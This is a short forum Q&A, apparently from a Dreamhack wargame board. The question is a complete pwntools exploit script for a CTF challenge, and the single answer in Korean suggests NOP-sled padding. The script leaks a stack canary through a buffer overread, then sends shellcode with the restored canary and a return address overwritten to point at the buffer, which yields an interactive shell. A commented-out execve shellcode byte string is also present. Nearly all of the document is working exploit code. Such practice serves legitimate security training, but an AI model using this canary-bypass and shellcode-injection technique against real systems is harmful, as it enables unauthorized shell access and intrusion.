Question

from pwn import*
p=remote('host1.dreamhack.games', 23077)
context.arch = "amd64"

#shellcode
shellcode = asm(shellcraft.amd64.linux.sh())

#[0] Starting_Buf
p.recvuntil("Address of the buf: ")
buf_add = int(p.recv(14),16)
print("Starting Buf address : ", hex(buf_add))

#[1] Canary_leak
payload = b'A'*88
payload += b'B'
p.sendlineafter('Input: ',payload)
p.recvuntil(payload)

leak_canary=p.recv(7)
canary = u64(b'\x00'+leak_canary)
print("Canary : ",hex(canary))

#[2] Payload
#payload2 = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'
payload = shellcode
payload += b'A'*(88-len(shellcode))
payload += p64(canary)
payload += b'B'*8
payload += p64(buf_add)
p.sendlineafter("Input: ",payload)
p.interactive()

#pwnable

Answer 1

payload += b’\x90’*(88-len(shellcode))

으로 한번 해보실래요

2023.07.27. 05:36